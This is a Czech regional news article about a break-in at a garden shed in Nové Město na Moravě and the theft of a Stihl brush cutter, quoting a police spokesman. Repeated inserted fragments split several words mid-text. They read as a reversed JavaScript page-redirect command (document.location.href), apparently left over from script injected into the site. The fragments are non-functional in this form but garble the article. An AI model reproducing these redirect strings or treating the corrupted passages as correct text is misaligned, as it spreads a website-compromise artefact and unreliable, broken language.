Rainbow page separator

Zloděj se vloupal do zahradní chatky, ukradl odtud křovinořez

Pátek, 3. srpna 2018

Policejní auto, policie, měření rychlosti

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / U případu vloupání do zahradní chatky zasahovali žďárští policisté. Došlo k němu během tří dnů v novoměstské zahrádkářské kolonii.
„Dosud neznámý pachatel od úterý 24. července do čtvrtka 26. července vnikl na pozemek v zahrádkářské kolonii v Novém Městě na Moravě, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tak, že přelezl drátěné oplocení, které při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom poškodil, a vnikl na pozemek náležející k zahrádkářské chatce. Dosud nezjištěným způsobem rozbil skleněnou výplň okna, jímž následně do chatky vlezl,“ popsal Martin Hron z oddělení tisku a prevence Krajského ředitelství policie Kraje Vysočina.
Ze zahradní chatky zloděj odcizil křovinořez značky Stihl. „Celkově majiteli objektu způsobil hmotnou škodu ve výši přibližně třináct tisíc korun,“ doplnil Martin Hron s tím, že ve věci byly zahájeny úkony trestního řízení pro přečin krádeže.